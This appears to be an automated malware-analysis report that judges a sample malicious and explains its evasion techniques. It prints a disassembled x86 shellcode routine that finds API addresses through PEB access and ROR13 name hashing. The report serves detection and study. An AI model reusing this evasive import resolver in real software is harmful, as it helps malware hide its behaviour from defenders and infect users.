Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1218.011 Signed Binary Proxy Execution: Rundll32
The sample triggers high-severity heuristics for PEB access and API-hash resolution, which indicate deliberate evasion techniques. Malware loaders commonly use these methods to hide which APIs they call (no import table entries, no plaintext API names) and so defeat static analysis. No document body or script content was extracted, but the presence of these evasion techniques strongly suggests the file's purpose is to download and execute a secondary malicious payload.
Heuristics (2)
- PEB access via FS segment (x86) · severity: high · rule: SC_PEB_ACCESS · PEB access via FS segment (x86)
Disassembly
x86 disassembly · validity: code (0.984) · 8/8 branch targets land on an instruction boundary (100% coherence)
    0003EF36  648b4030    mov eax, dword ptr fs:[eax + 0x30]
    0003EF3A  8b400c      mov eax, dword ptr [eax + 0xc]
    0003EF3D  8b701c      mov esi, dword ptr [eax + 0x1c]
    0003EF40  ad          lodsd eax, dword ptr [esi]
    0003EF41  8b6808      mov ebp, dword ptr [eax + 8]
    0003EF44  51          push ecx
    0003EF45  56          push esi
    0003EF46  57          push edi
    0003EF47  8b453c      mov eax, dword ptr [ebp + 0x3c]
    0003EF4A  368b542878  mov edx, dword ptr ss:[eax + ebp + 0x78]
    0003EF4F  03d5        add edx, ebp
    0003EF51  52          push edx
    0003EF52  8b5220      mov edx, dword ptr [edx + 0x20]
    0003EF55  03d5        add edx, ebp
    0003EF57  33c0        xor eax, eax
    0003EF59  33c9        xor ecx, ecx
    0003EF5B  41          inc ecx
    0003EF5C  8b348a      mov esi, dword ptr [edx + ecx*4]
    0003EF5F  03f5        add esi, ebp
    0003EF61  33ff        xor edi, edi
    0003EF63  c1cf0d      ror edi, 0xd
    0003EF66  ac          lodsb al, byte ptr [esi]
    0003EF67  03f8        add edi, eax
    0003EF69  85c0        test eax, eax
    0003EF6B  75f6        jne 0x3ef63
    0003EF6D  3bfb        cmp edi, ebx
    0003EF6F  75ea        jne 0x3ef5b
    0003EF71  5a          pop edx
    0003EF72  8b5a24      mov ebx, dword ptr [edx + 0x24]
    0003EF75  03dd        add ebx, ebp
    0003EF77  668b0c4b    mov cx, word ptr [ebx + ecx*2]
    0003EF7B  8b5a1c      mov ebx, dword ptr [edx + 0x1c]
    0003EF7E  03dd        add ebx, ebp
    0003EF80  8b048b      mov eax, dword ptr [ebx + ecx*4]
    0003EF83  03c5        add eax, ebp
    0003EF85  5f          pop edi
    0003EF86  5e          pop esi
    0003EF87  59          pop ecx
    0003EF88  83f901      cmp ecx, 1
    0003EF8B  7408        je 0x3ef95
    0003EF8D  8bff        mov edi, edi
    0003EF8F  55          push ebp
    0003EF90  8bec        mov ebp, esp
    0003EF92  83c005      add eax, 5
    0003EF95  ff          .byte 0xff
- PEB API-hash resolver · severity: high · rule: SC_API_HASH_RESOLVER · PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
Disassembly
x86 disassembly · validity: code (0.984) · 8/8 branch targets land on an instruction boundary (100% coherence) · same listing (0003EF36 through 0003EF95) as shown under the PEB access heuristic above